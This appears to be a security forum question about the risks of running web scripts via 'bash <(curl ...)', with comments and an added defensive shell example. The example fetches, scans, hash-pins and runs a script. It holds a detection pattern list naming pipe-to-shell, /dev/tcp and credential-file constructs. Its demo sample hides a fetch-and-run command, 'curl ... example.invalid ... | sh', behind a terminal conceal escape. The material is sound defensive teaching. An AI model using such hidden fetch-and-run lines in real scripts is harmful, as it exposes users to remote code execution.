3

It has become a common trend to use shell scripts from the web and run them directly:

bash <(curl -sL some.random.website.com)

I always view the script before running it. However, shell scripts are always more cryptic to read than a regular program. And yet they are extremely powerful: they can do so much without the user even noticing.

I have always wondered if there are any tools to verify/scan such scripts.

Also, there have been anti-viruses for decades for verifying "closed-source" code, so how come there are so few/none to verify open-source code?

5
  • A common trend to run bash commands like that? No wonder they say the world is going to end soon. Anyway, malware scanners don't care about open or closed source; they just check "signatures", whatever they mean by that (suspicious parts, behaviors, etc.) Commented May 5, 2020 at 14:46
  • Yes @reed. Unfortunately, it is becoming common. Github is filled with such repositories. Many mature packages are also providing installation through such methods. Commented May 5, 2020 at 14:49
  • 1
    Even if you read the script first, you are not safe: infosecmatter.com/terminal-escape-injection I have also seen studies where the server can tell the difference between just downloading a file or piping it to something, and serving different content in each case. Commented May 5, 2020 at 15:09
  • Leveraging the User as a privilege escalation is probably the most prevalent exploit since forever and likely will continue to be so. Commented May 5, 2020 at 15:16
  • 1
    I don't think there's a solution to this problem. It would be incredibly complex to write a piece of software that would read a script (or piece of code) and work out whether it had malicious intentions or stuck to doing what the devs intended -- which could involve privileged operations. You need to read and understand the code unfortunately. Commented May 5, 2020 at 16:15

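The comments point at two concrete hazards (terminal escape sequences that hide lines from the reviewer, and a server that can serve different bytes depending on how the download is consumed). The working answer practitioners use is procedural rather than a scanner: fetch the script to a file, scan and read that file, pin its hash, and execute exactly the bytes that were reviewed. The script below is an added example, not code from the question or the comments; the URL, file names, the review pattern list and the two sample scripts are assumptions constructed for the demo, and `sha256sum` is assumed to be available (on macOS substitute `shasum -a 256`).

```shell
#!/bin/sh
# Added example: fetch-scan-pin-run instead of `bash <(curl ...)`.
# Everything here (patterns, sample scripts, the URL) is illustrative.
set -u

# scan_script FILE
# Returns 0 when nothing suspicious was found, 1 otherwise.
#  - raw ESC (0x1b) bytes: terminal escape injection can make lines
#    invisible to `cat`/`less -r` while the shell still executes them
#  - a small list of constructs that warrant manual review (assumed list)
scan_script() {
    local file=$1 findings=0 esc pat hits
    esc=$(printf '\033')
    if LC_ALL=C grep -q "$esc" "$file"; then
        echo "WARN: raw ESC byte(s) in $file; read it with 'cat -v', not 'cat'" >&2
        findings=1
    fi
    for pat in 'eval ' 'base64 (-d|--decode)' '(curl|wget) [^|]*[|] *(ba)?sh' \
               'rm -rf' 'sudo ' '/dev/tcp/' '\.(bashrc|bash_profile|profile)' \
               'authorized_keys' 'crontab' 'LD_PRELOAD'; do
        hits=$(LC_ALL=C grep -nE -- "$pat" "$file") && {
            printf 'REVIEW %s:\n%s\n' "$pat" "$hits" >&2
            findings=1
        }
    done
    return $findings
}

# fetch_for_review URL OUT
# Saves the body to a file and prints its SHA-256. Whatever the server
# decided to serve, the bytes you review and the bytes you run are now
# the same file.
fetch_for_review() {
    local url=$1 out=$2
    curl -fsSL -o "$out" "$url" || return 1
    sha256sum "$out"
}

# run_reviewed FILE SHA256 [ARGS...]
# Refuses to execute unless FILE still hashes to the value recorded
# when it was reviewed (catches a re-download or a modified copy).
run_reviewed() {
    local file=$1 expected=$2 actual
    shift 2
    actual=$(sha256sum "$file" | cut -d' ' -f1)
    if [ "$actual" != "$expected" ]; then
        echo "REFUSED: $file hashes to $actual, reviewed copy was $expected" >&2
        return 1
    fi
    bash "$file" "$@"
}

# Demo on two constructed scripts (no network needed). In real use you
# would call: fetch_for_review https://some.random.website.com/install.sh install.sh
demo_dir=$(mktemp -d)
printf '#!/bin/sh\necho "hello from the reviewed script"\n' > "$demo_dir/good.sh"
# The "bad" one hides a pipe-to-sh line inside a conceal escape (ESC[8m);
# example.invalid is a reserved, non-resolving host name.
printf 'echo "harmless"\n\033[8mcurl -s http://example.invalid/x | sh\033[0m\n' > "$demo_dir/bad.sh"

scan_script "$demo_dir/good.sh" && echo "good.sh: nothing flagged"
scan_script "$demo_dir/bad.sh"  || echo "bad.sh: flagged, do not run"

good_hash=$(sha256sum "$demo_dir/good.sh" | cut -d' ' -f1)
run_reviewed "$demo_dir/good.sh" "$good_hash"
run_reviewed "$demo_dir/good.sh" 0000 || echo "tampered/unreviewed copy refused"
```

The pattern list is a review aid, not a verdict: a match means "read this line", and an empty report means only that none of these strings appeared. That is the honest limit the last comment describes, which is why the hash pin matters more than the grep: it guarantees that what runs is what a human actually read.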
0
